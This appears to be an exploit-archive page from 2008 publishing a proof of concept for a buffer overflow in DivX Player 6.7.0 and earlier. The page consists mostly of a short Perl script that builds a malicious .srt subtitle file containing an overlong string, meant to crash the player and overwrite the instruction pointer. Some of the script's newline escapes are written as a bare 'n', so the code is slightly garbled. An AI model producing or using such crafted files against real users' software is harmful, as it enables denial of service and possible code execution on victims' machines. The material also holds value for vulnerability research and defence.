DivX Player <= 6.7.0 SRT File Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : DivX Player <= 6.7.0 SRT File Buffer Overflow PoC
# Published : 2008-04-15
# Author : securfrog
# Previous Title : xine-lib <= 1.1.12 NSF demuxer Stack Overflow Vulnerability PoC
# Next Title : XM Easy Personal FTP Server 5.4.0 (XCWD) Denial of Service Exploit

# DIVX Player <= 6.7.0 Buffer Overflow PoC (  .SRT )
# Bug: When parsing a subtitle file with an overly long subtitle DIVX player will deadly crash  with eip overwritted:
# Replace MOVIE_FILENAME by your movie filename ( .avi )
#
#!/usr/local/bin/perl                                        
my $file="MOVIE_FILENAME.srt";                           
                                                             
my $payload = "A" x 4096;                                    
                                                             
open( $file, ">>$file") or die "Cannot open $file: $!";      
   
print $file "1 n";
print $file "00:00:01,001 --> 00:00:02,001n";
print $file $payload;                              
                                                             
close($file);                                                
                                                             
print "$file has been created n";    

# www.Syue.com [2008-04-15]